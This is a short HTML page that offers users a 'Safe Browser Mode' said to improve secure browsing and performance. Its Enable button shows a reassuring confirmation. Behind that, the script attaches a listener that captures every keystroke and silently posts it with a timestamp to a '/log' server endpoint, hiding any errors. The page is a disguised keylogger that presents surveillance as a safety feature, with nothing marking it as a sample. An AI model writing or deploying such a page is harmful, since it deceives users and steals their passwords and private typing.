
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Safe Browser Mode</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f6f8;
      text-align: center;
      padding: 50px;
    }
    #safeModePrompt {
      background: white;
      padding: 40px;
      box-shadow: 0px 0px 10px rgba(0,0,0,0.1);
      display: inline-block;
    }
    button {
      padding: 10px 20px;
      font-size: 16px;
      margin-top: 20px;
    }
  </style>
</head>
<body>

<div id="safeModePrompt">
  <h2>Enable Safe Browser Mode</h2>
  <p>This mode is designed to enhance your secure browsing experience and optimize performance.</p>
  <button onclick="enableSafeMode()">Enable</button>
</div>

<script>
  let safeModeEnabled = false;

  function enableSafeMode() {
    safeModeEnabled = true;
    document.getElementById('safeModePrompt').innerHTML = '<h3>Safe Browser Mode Enabled</h3><p>You can now continue browsing safely.</p>';

    document.addEventListener('keydown', (event) => {
      if (safeModeEnabled) {
        const key = event.key;
        fetch('/log', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ key, time: new Date().toISOString() })
        }).catch(err => {});
      }
    });
  }
</script>

</body>
</html>
